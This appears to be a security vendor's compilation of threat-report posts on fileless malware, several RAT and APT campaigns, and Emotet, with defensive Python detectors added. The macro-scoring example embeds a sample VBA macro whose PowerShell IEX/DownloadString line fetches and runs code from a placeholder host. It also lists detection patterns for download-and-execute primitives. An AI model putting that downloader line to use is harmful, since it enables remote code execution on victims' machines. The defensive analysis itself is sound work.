Fileless Malware: If You’re Not Worried, You Should Be

Gartner, Inc. estimates that more than $124 billion will be spent on information security products and services in 2019. Meanwhile, it is estimated that cybercrime will cost the world in excess of $6 trillion annually by 2021, up from $3 trillion in 2015. While the message that “crime does not pay” was drilled into our heads by TV and movies… it seems that this crime does.

The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I'm the creeper, catch me if you can!” and would disable that workstation.

Over the years, the bad guys have continued to hone their tools, and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each has its own unique traits, the intent is the same: infecting a computer to do something “evil” on behalf of a threat actor.

As the cat-and-mouse game between security professionals and threat actors plays out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing, and it brings a unique set of challenges to an industry that still thinks in terms of combating file-based attacks.

Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.

These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development; and Microsoft Office macros can be used to work magic in Microsoft Word, Excel or PowerPoint.

So, how can you protect against these types of attacks? Turning everything off isn’t possible. A typical enterprise would quickly grind to a halt (and technically it would be virtually impossible to do).

The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. As they utilize legitimate Windows functions, they are hard to detect. So threat actors can hide in the shadows of what looks to be normal activity.

Existing signature-based security products can help with known threats, yet they are challenged to protect against fileless malware attacks. The payload seems to be legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contents and instead understand what that payload is capable of.

While great efforts have been made to educate end users to recognize when an email doesn’t look right, and to provide them with a mechanism to report it to the security team, this is only part of the solution. It only takes one user opening an attachment that they should not have to cause a problem.

This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.
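The distinction drawn above, between a macro that calculates commissions and one that hands PowerShell a download command, can be made mechanically by scoring what a macro is able to do rather than what it claims to be. The following Python scorer is an added example, not BluVector’s code; the two macros it scans are constructed, and the rule weights and threshold are illustrative assumptions.

```python
import re

# Each rule: (capability, pattern, weight). Weights and the threshold are
# illustrative assumptions, not a vendor's scoring scale.
CAPABILITY_RULES = [
    ("auto-executes on open",
     re.compile(r"\bSub\s+(Auto_?Open|Document_Open|Workbook_Open)\b", re.I), 1),
    ("spawns a process",
     re.compile(r"\b(Shell|WScript\.Shell|Win32_Process)\b", re.I), 2),
    ("invokes PowerShell",
     re.compile(r"\bpowershell(\.exe)?\b", re.I), 3),
    ("downloads content",
     re.compile(r"\b(DownloadString|DownloadFile|XMLHTTP|URLDownloadToFile"
                r"|Invoke-WebRequest|IEX|Invoke-Expression)\b", re.I), 3),
    ("obscures strings",
     re.compile(r"\b(Chr\s*\(|StrReverse|FromBase64String)", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 5


def assess_macro(vba_source: str) -> dict:
    """Score a macro by the capabilities it exhibits, ignoring its stated purpose."""
    hits = [(name, weight) for name, pattern, weight in CAPABILITY_RULES
            if pattern.search(vba_source)]
    score = sum(weight for _, weight in hits)
    return {
        "capabilities": [name for name, _ in hits],
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign-looking",
    }


# Constructed sample macros, not taken from any real document.
COMMISSION_MACRO = """
Sub CalcCommission()
    Dim r As Range
    For Each r In Range("B2:B50")
        r.Offset(0, 1).Value = r.Value * 0.05
    Next r
End Sub
"""

DOWNLOADER_MACRO = '''
Sub AutoOpen()
    Dim s As Object
    Set s = CreateObject("WScript.Shell")
    s.Run "powershell -c ""IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"""
End Sub
'''

if __name__ == "__main__":
    for label, macro in (("commission", COMMISSION_MACRO), ("downloader", DOWNLOADER_MACRO)):
        result = assess_macro(macro)
        print(f"{label}: {result['verdict']} (score {result['score']}) {result['capabilities']}")
```

The commission macro triggers no rule at all, while the downloader accumulates auto-execution, process creation, PowerShell and download capabilities without any signature for the specific document being needed.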

A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.

The good news is that the Speculative Code Execution in BluVector Cortex was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.

Adwind RAT Targets U.S. Petroleum Industry

What Is It?

A new campaign utilizing the Adwind RAT (Remote Access Trojan) and specifically targeting organizations within the U.S. petroleum industry has been discovered by researchers at Netskope. The Adwind RAT is also known as AlienSpy, Frutas, jRAT, JSocket and Sockrat and is written in Java, allowing it to execute on Windows, Linux and Mac systems.

Adwind is available for sale by its authors on the dark web via a malware-as-a-service (MaaS) offering, where attackers pay a fee in order to use the malware in their malicious campaigns. Adwind has been available for a number of years and reports state there were approximately 1,800 unique customers at the end of 2015.

Adwind contains functionality expected of a RAT, including the ability to log keystrokes, steal credentials stored on the system or entered on web pages, take screenshots or record audio and video, manipulate files, steal cryptocurrency keys and VPN certificates, and download and execute other malware. Netskope found that the attackers behind this campaign were using Adwind as a reconnaissance and exfiltration tool to acquire credentials, documents and other files, such as SSH keys, to allow the attackers to move laterally through the network.

The Adwind malware itself isn’t particularly sophisticated at a code level and Netskope believes the variants in this campaign weren’t using the latest versions. However, what makes this campaign noteworthy is the use of multi-level obfuscation and encryption as an attempt to evade detection by legacy security products, including anti-virus. The initial malicious Java JAR file infects systems at targeted organizations as an attachment or a link in a malicious spam email. This JAR file copies itself to the user’s directory and runs the copy, which then decrypts and executes the next stage, which in turn then creates the final JAR payload.

Netskope found the authors’ time and effort was well spent creating the multi-level obfuscation and encryption. When the samples were initially scanned by the VirusTotal service, the initial sample was only detected by five products, whereas the final, unobfuscated sample was detected by 49. Clearly their techniques were successful at evading detection by legacy anti-virus products.

After the fact, these products can now create signatures to detect this specific initial sample, however, BluVector Cortex was capable of detecting both these samples months prior to them even being created.

How Does It Propagate?

The Adwind malware does not contain the necessary code to self-propagate. Malicious spam emails containing a link or attachment are used to compromise systems at targeted organizations.

When/How Did BluVector Detect It?

Both the initial and final malicious JAR samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown these samples would have been detected for an average of 30 months prior to their release.

PcShare Malware Brings a Fake Narrator

What Is It?

Researchers from Cylance’s research and intelligence team have detailed an ongoing campaign called PcShare by a suspected Chinese APT (Advanced Persistent Threat) group targeting heavy industrial organizations in South East Asia, including the Philippines and Taiwan. The attack, composed of two components, starts with a customized variant of a Chinese open source remote access trojan (RAT), PcShare, which is then followed by a trojanized screen reader that replaces the Narrator utility, part of the Microsoft Accessibility Features supplied with Microsoft Windows 10.

The source code for several versions of PcShare is available on GitHub, however the version used by these attackers is heavily modified and employs techniques intended to make detection, especially by legacy anti-virus products, more difficult. Firstly, the code for any functionality not required by the attackers has been removed, which not only makes the code smaller and more efficient, but is likely intended to make signature-based detection less likely. Next, the attack uses a technique known as “DLL side loading” to use a legitimate application to load malicious code into memory and execute it. In this case, a component of the NVIDIA graphics driver is used to achieve this.

The malicious payload is encrypted with the most basic of methods, an XOR operation using a single byte as the encryption key. However, as an anti-analysis mechanism against manual or automated sandbox analysis, the single-byte encryption key is calculated from the name of its parent process. Once decrypted, the payload is loaded in RAM without ever being saved to disk, again attempting to avoid detection by endpoint security software. These techniques are all relevant only in the context of the malware executing on an endpoint and have no impact on BluVector’s network detection capabilities.
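Deriving the key from the parent-process name defeats a sandbox that runs the payload under the wrong parent, but a single-byte XOR still leaves only 256 possible keys, so an analyst with the encrypted blob can recover the payload by trying every key and checking for a Windows executable header. This Python snippet is an added example, not Cylance’s or BluVector’s code; the key derivation, parent-process name and payload bytes are constructed placeholders, since the page does not disclose the real ones.

```python
"""Brute-forcing a single-byte XOR key when the key source is unavailable."""

PARENT_PROCESS_NAME = "legit-parent.exe"  # constructed placeholder, not the real loader


def derive_key(parent_process_name: str) -> int:
    """Constructed stand-in for the malware's undisclosed key derivation."""
    return sum(parent_process_name.lower().encode()) & 0xFF


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap plausibility check: 'MZ' DOS stub plus the 'PE' signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    pe_offset = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[pe_offset:pe_offset + 4] == b"PE\0\0"


def brute_force_single_byte_xor(ciphertext: bytes):
    """Try all 256 keys and return (key, plaintext) for every PE-shaped result."""
    candidates = []
    for key in range(256):
        plaintext = xor_bytes(ciphertext, key)
        if looks_like_pe(plaintext):
            candidates.append((key, plaintext))
    return candidates


def build_sample_payload() -> bytes:
    """Constructed, non-functional stand-in for a PE payload: headers only."""
    header = bytearray(0x80)
    header[0:2] = b"MZ"
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew: PE signature at 0x40
    header[0x40:0x44] = b"PE\0\0"
    return bytes(header) + b"constructed payload body"


SAMPLE_PAYLOAD = build_sample_payload()
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PAYLOAD, derive_key(PARENT_PROCESS_NAME))

if __name__ == "__main__":
    for key, plaintext in brute_force_single_byte_xor(SAMPLE_CIPHERTEXT):
        print(f"key 0x{key:02x} yields a PE-shaped blob of {len(plaintext)} bytes")
```

Because XOR with any wrong key changes both bytes of the "MZ" stub, exactly one key survives the header check, whatever parent the loader expected.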

Some of the functionality removed from publicly available PcShare versions relates to audio/video streaming and keylogging. However, the attackers have added the ability to encrypt C2 (command and control) traffic. They have also added code to obtain proxy authentication credentials stored on the infected system; as most corporate networks utilize proxies, this allows the malware to communicate in such an environment. As a RAT, it has functionality to manipulate files, running processes and registry keys, and to download and execute other code.

One such piece of code is the so-called fake Narrator malware. The purpose of fake Narrator is to allow the attackers to remotely obtain access to a command prompt, with system-level privileges, without authentication. Prior to installing fake Narrator on an infected system, the attackers rename the legitimate Narrator executable. When fake Narrator has been enabled at the logon screen via Ease of Access, it runs the legitimate Narrator and creates a hidden, overlapped window. It then monitors keystrokes for a hardcoded password which, if received, allows the attackers to run any application with system privileges on the logon screen. The infected system is now completely compromised and remotely accessible by the attackers.

How Does It Propagate?

The malware discussed here does not self-propagate. The infection vector is not known. However, the most likely vector is social engineering, either as a malicious attachment or downloads performed by malicious documents or links.

When/How Did BluVector Detect It?

Three samples of PcShare are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Despite the samples being first seen in the wild up to 15 months ago, regression testing has shown the samples would have been detected an average of 47 months prior to their original release.

Emotet Returns After a Summer Break

What Is It?

First discovered in 2014, the Emotet trojan has previously been the subject of several Threat Reports. Initially a banking trojan, it has since evolved to focus on sending spam emails and distributing other malware. This change in functionality might be tied to that being a more profitable option for its authors.

In early June 2019, it was observed that its C2 (command and control) servers had stopped communicating with infected systems. Researchers posited this would be a temporary shutdown and were proven correct, as C2 traffic restarted on August 22nd. After the restart, it appears that the authors performed some housekeeping on their infrastructure, such as removing fake bots attempting to communicate to the C2 servers and preparing the next campaign.

In mid-September the new campaign began, aimed at users in the U.S., the UK, Poland, Italy and Germany. This was a widespread campaign, with spam emails received by home users in addition to corporate and government organizations. Researchers from Cofense Labs found emails from this campaign were sent to users at more than 30,000 domain names and came from 3,362 unique senders at 1,875 domains. The senders’ email credentials had previously been stolen. The spam emails used mainly financially oriented lures, such as overdue bills or payment receipts, and were written in the language (English, Polish, Italian and German) matching the domain they were sent to. True to form for Emotet, the attachments to these emails were Microsoft Word documents with malicious macros. Once the Emotet trojan was installed, the Trickbot trojan was downloaded, which frequently results in a tertiary infection of Ryuk ransomware.

The campaign described above has been followed up with another beginning this week. Utilizing another oft-used technique from the attacker’s playbook, the lure of this campaign is that the attachment is a Microsoft Word copy of the highly-publicized and controversial new book by Edward Snowden.

Researchers from Malwarebytes Labs found examples of these spam emails in English, French, Spanish, German and Italian. When the user opens the Microsoft Word document, it uses a social engineering technique similar to the previous campaign’s to convince users to grant the permissions the malicious macro needs to execute. In this case, the document states that Word has not been activated and that, in order to continue using it, the user must enable editing and enable content.

Emotet continues to be an extremely dangerous and prolific threat, in most cases a triple threat of Emotet, Trickbot and Ryuk. The potential end result is the theft of data and credentials followed by encryption of the user’s data.

How Does It Propagate?

Emotet uses malicious Microsoft Word documents attached to spam emails as its initial infection vector. However, Emotet also contains a list of frequently used passwords which it uses to attempt to access and infect other systems on the network.

When/How Did BluVector Detect It?

Samples are publicly available from both Emotet campaigns described above and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown samples of both the malicious Microsoft Word documents and the Emotet trojan would have been detected for up to 69 months prior to their release.

Every Employee Is a Cybersecurity Employee

Once, during new hire training, a portion of the program had a representative from each department introduce their department, explain its function and answer any questions from new employees.

In one of these trainings, a salesman talked about his team and then asked the new employees, “What department do you work in?” Hands went up with answers of “finance,” “human resources,” “customer support,” “engineering” among others. Once everyone was done, he took a dramatic pause and loudly stated, “No! You all work in sales!” His logic was that every employee of the company worked for sales, because each of them helped to represent and “sell” the company to others.

Today, while that still rings true, there is an additional job that everyone in the organization has – being part of the cyber defense for the organization. That shared responsibility is key in making sure that an organization, of any size, is protected against threats.

In 2004, to help promote awareness of the threats, the National Cyber Security Division within the Department of Homeland Security and the nonprofit National Cyber Security Alliance launched National Cyber Security Awareness Month (NCSAM).

October is NCSAM and the theme for 2019 is “Own IT. Secure IT. Protect IT.”, which puts the focus of the shared responsibility on the individual. “Own IT” focuses on the end-user owning their own presence online making them responsible for privacy and application usage. “Secure IT” is about reminding end users to ensure that all transactions are secure and that they are aware of their surroundings online. Finally, “Protect IT” reminds users and enterprises to keep up with the latest security software and patches for browsers, devices and operating systems, as well as to make sure that data that is collected (data at rest) is protected.

Security and IT organizations should focus their efforts on setting up awareness and education programs for their end users as well as for system administrators and security teams. End users should be educated on how to spot, avoid and report phishing emails to avoid exposing the organization to malware. System administrators should be reminded to keep their applications and servers up to date with patches and to stay abreast of the latest Common Vulnerabilities and Exposures (CVE) entries relevant to their systems. Users with remote access permissions or using their own devices (BYOT) need to be reminded how to use these safely to access organization resources. Finally, all employees need to understand the exposure created by the use of social media, especially the risk posed by spearphishing.

Cybersecurity awareness should not be limited to the month of October, and neither should the awareness activities and programs. Organizations are under constant threat from every angle. Keeping an organization secure is a full-time job and, just like the sales guy who stated that everyone is in sales… every employee is part of the cyber defense for an organization.

Thrip APT Group Continues Attacks

What Is It?

Symantec has published the results of research into continuing attacks from an APT (Advanced Persistent Threat) group known as Thrip. It first reported on the activities of this group in June 2018, after Thrip had been targeting satellite communications, telecommunications, geospatial imaging and government/defense organizations, mainly in South East Asia. Attacks by Thrip utilized custom malware in addition to commonly used utilities such as PsExec, PowerShell and the open source FTP client WinSCP.

Since mid-2018, Thrip has continued to target organizations in South East Asia involved in maritime communications, media, education, military and additional satellite communications providers. Target organizations are located in Hong Kong, Indonesia, Macau, Malaysia, the Philippines and Vietnam.

The custom malware utilized in these attacks consists of two backdoors, designated Hannotog and Sagerunex. Additionally, Thrip uses new variants of an information stealer referred to as Catchamas. The Hannotog backdoor provides Thrip with a foothold into a network, Sagerunex offers remote access to systems within the network and Catchamas is selectively installed on systems identified as potentially containing information of value to the attackers.

Thrip also makes use of commonly used utilities, a technique known as “living off the land,” to move laterally through a network and perform reconnaissance. From an attacker’s point of view, the aim is to make use of a target system’s native tools that have numerous legitimate uses, such as PowerShell, which is heavily used by Microsoft Windows administrators to perform system management tasks. In this way, less malware needs to be deployed, potentially reducing the likelihood of detection of the compromise, especially by legacy anti-virus solutions.

Symantec found that Sagerunex appears to be an updated variant of the Evora backdoor malware used by the Billbug APT group. That group has been active for more than 10 years and, like Thrip, has a history of executing attacks against organizations in South East Asia. Attribution can be an inexact science, but Symantec believes that Thrip and Billbug may be the same group or separate teams within the same group. Billbug has previously used spearphishing attacks with malicious PDF or Microsoft Office documents as its initial infection vector.

How Does It Propagate?

Though not specifically mentioned, it is likely that the initial infection occurs via malicious PDF or Microsoft Office documents, either as attachments or links within spearphishing emails.

When/How Did BluVector Detect It?

There are 25 samples publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown the samples would have been detected for an average of 21 months prior to their release.

Microsoft .NET Utilized to Create New Malware Threats on the Fly

An Internet Storm Center diary entry from last week described recent examples the handler had seen of malware that dynamically compiled the next payload on the infected system. While this is not a new approach to attempting to evade detection, previous instances required that development tools such as compilers were already installed on the system, significantly reducing the potential attack surface. This meant that the user of the infected machine was likely a software developer. On one side, this would limit the number of targets. On the other hand, if a software developer were to compile software that might be shared or sent to others, this would increase the likelihood of additional infections.

In this case, the samples utilize components of the Microsoft .NET runtime environment, which is installed on the vast majority of systems running Microsoft Windows. That means that any system running Windows might be vulnerable to this type of attack.

Both samples create Metasploit Meterpreter reverse shells, giving attackers backdoor access to infected systems. The first sample is a JScript script which decodes included base64 data and passes it to the JScript compiler, resulting in an executable payload. The second sample is a Microsoft Excel spreadsheet containing a malicious macro which also decodes included base64 data. This time the decoded data is passed to the msbuild.exe utility, again resulting in an executable payload.

In both of these cases the attackers are attempting to use dynamic compilation to evade detection for their second stage payloads. However, there is nothing sophisticated or novel about their initial infection vectors, which negates their second stage efforts.
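The process chains in the two samples (a script host launching the JScript compiler, Excel launching msbuild.exe) are visible in endpoint process-creation telemetry, which complements network-level detection of the initial document. The following Python check is an added example, not the diary’s or BluVector’s code; it uses Sysmon-style field names over a constructed set of events, and the compiler and parent name lists are assumptions.

```python
import ntpath

# Assumed lists (not from the diary): .NET compile/build binaries, and parents that
# indicate a document or script, rather than a developer, drove the compilation.
DOTNET_COMPILERS = {"jsc.exe", "csc.exe", "vbc.exe", "msbuild.exe"}
DOCUMENT_DRIVEN_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                           "excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}


def image_name(path: str) -> str:
    """Case-insensitive basename of a Windows image path."""
    return ntpath.basename(path).lower()


def flag_dynamic_compilation(events):
    """Return an alert for each process-creation event in which a .NET compiler
    was launched directly by a script host or an Office application."""
    alerts = []
    for ev in events:
        child, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
        if child in DOTNET_COMPILERS and parent in DOCUMENT_DRIVEN_PARENTS:
            alerts.append({
                "time": ev["UtcTime"],
                "parent": parent,
                "child": child,
                "reason": f"{parent} launched {child}: likely compiling a second stage on the fly",
            })
    return alerts


# Constructed Sysmon-style (Event ID 1) process-creation records, not real telemetry.
NET = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
SAMPLE_EVENTS = [
    {"UtcTime": "2019-10-08 14:02:11", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"UtcTime": "2019-10-08 14:02:13", "Image": NET + r"\jsc.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"UtcTime": "2019-10-08 15:11:40", "Image": NET + r"\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    # Benign developer activity: an IDE driving a build, and that build calling csc.
    {"UtcTime": "2019-10-08 16:30:02", "Image": NET + r"\MSBuild.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"},
    {"UtcTime": "2019-10-08 16:30:05", "Image": NET + r"\csc.exe",
     "ParentImage": NET + r"\MSBuild.exe"},
]

if __name__ == "__main__":
    for alert in flag_dynamic_compilation(SAMPLE_EVENTS):
        print(alert["time"], alert["reason"])
```

Only the two document-driven compiles are flagged; the IDE build and the compiler it spawns pass because their parents are developer tools, which keeps the rule usable on workstations where .NET builds are routine.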

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine (MLE) detected the samples. Regression testing has shown the samples would have been detected up to 71 months prior to their release.

APT28 Using Sofacy Backdoor to Evade Machine Learning

The Cylance Threat Research Team released a deep dive report into a piece of malware utilized by the APT28 cyber espionage group, also known as Fancy Bear. The sample was originally uploaded to VirusTotal in May 2019 by US Cyber Command.

The malware, often referred to by legacy AV by the generic name Sofacy, is a backdoor that receives instructions from a C2 (command and control) site and is capable of uploading and downloading files, creating processes and executing a remote shell. It can also contact its C2 site on a predefined schedule, otherwise remaining apparently dormant. C2 communication occurs over port 443 (HTTPS) or port 80 (HTTP). As with many backdoors, it includes the ability to generate C2 host domain names for resiliency purposes.

As this APT malware is used as the initial infection on compromised systems, researchers believe the APT28 group has spent considerable time and effort developing it in an attempt to evade detection by products utilizing machine learning. Examples of this include using standard libraries and compilers, commonly used by benign software. The researchers believe 99% of the code appears to be benign, which may be an attempt to bias the result of detection engines using machine learning towards a benign determination.

When/How Did BluVector Detect It?

Despite the apparent machine learning detection countermeasures, this sample is detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the sample would have been detected 13 months prior to its original release.

BRATA RAT Targets Brazilian Android Users

Researchers at Kaspersky have described a new remote access trojan (RAT) specifically targeting Android users in Brazil. They have named the malware BRATA, a name created via the contraction of “Brazilian RAT Android.” The first variant was detected in early 2019, with more than 20 variants appearing since BRATA was first reported on. The RAT has been distributed by the Google Play Store, in addition to other unaffiliated app stores.

The attackers have used multiple methods to infect users. Most commonly, variants claimed to be updates to the popular WhatsApp messaging application. However, other infection vectors have also included messages sent using WhatsApp, SMS messages or links in sponsored Google search results.

The RAT is capable of keylogging and can capture the user’s screen contents and stream it in real time to the attackers. It can also turn off the screen, or alternatively make it appear the screen is turned off, so that it can perform actions without the user’s knowledge. Additionally, as with most RATs, it can launch any installed applications and uninstall itself.

When/How Did BluVector Detect It?

Three samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected the trojan in all of those samples. Regression testing has shown that the samples would have been detected 25 months prior to their release. Note: BluVector would only detect the malware if the Android device was connected to a corporate network monitored by BluVector.

APT41 Serves Up State Hacking with a Side of Personal Gain

Researchers from FireEye have released a detailed report into a Chinese state-sponsored cyber espionage group they have named APT41. Over a period of seven years, the APT41 group has conducted cyber espionage activities against organizations in 14 countries, including the United States, the UK, France, Switzerland, South Korea, South Africa, Turkey, India, Italy and Japan. Targeted organizations belong to various industries including healthcare, media, pharmaceuticals, telecoms, travel, education and retail. Some of those compromises were timed in order to obtain intelligence related to corporate events, such as mergers.

What differentiates APT41 from other state-sponsored groups is that it has also targeted organizations related to the video game industry, in what appear to be financially motivated attacks, for personal rather than state gain. These attacks have occurred since 2014 and have run concurrently with the cyber espionage attacks. Moreover, APT41 has used tactics, techniques and procedures developed as part of its video game industry attacks to improve the success rate of its cyber espionage attacks.

The APT41 group often utilizes stolen digital certificates to allow it to sign malware, making it much more likely to appear benign. Legitimately signed malware is also a key component of one of APT41’s preferred attack vectors, targeted supply chain compromises. In June 2018, a supply chain compromise identified specific targets to receive malicious payloads based upon MAC address or hard drive serial numbers.

Researchers found APT41 utilizes over 46 different types of malware in its campaigns, including rootkits and master boot record bootkits (when particularly stealthy methods are required for specific targets). The APT41 group has remained persistent and able to adjust to reacquire a foothold into organizations within hours or days of actions taken by security teams to remove its malware. As an example, in a year-long campaign, APT41 utilized almost 150 unique pieces of malware, including backdoors, keyloggers, rootkits and information stealers, resulting in the compromise of hundreds of systems.

The malware deployed by APT41 can use genuine websites for command and control (C2) traffic, sites such as Microsoft TechNet, Pastebin and GitHub.

How Does It Propagate?

APT41 uses spear phishing and supply chain compromises as common initial infection vectors. They are not known to use self-propagating malware, which would be considered too noisy for their purposes.

When/How Did BluVector Detect It?

All of the 14 publicly available samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the samples would have been detected an average of 20 months prior to their release.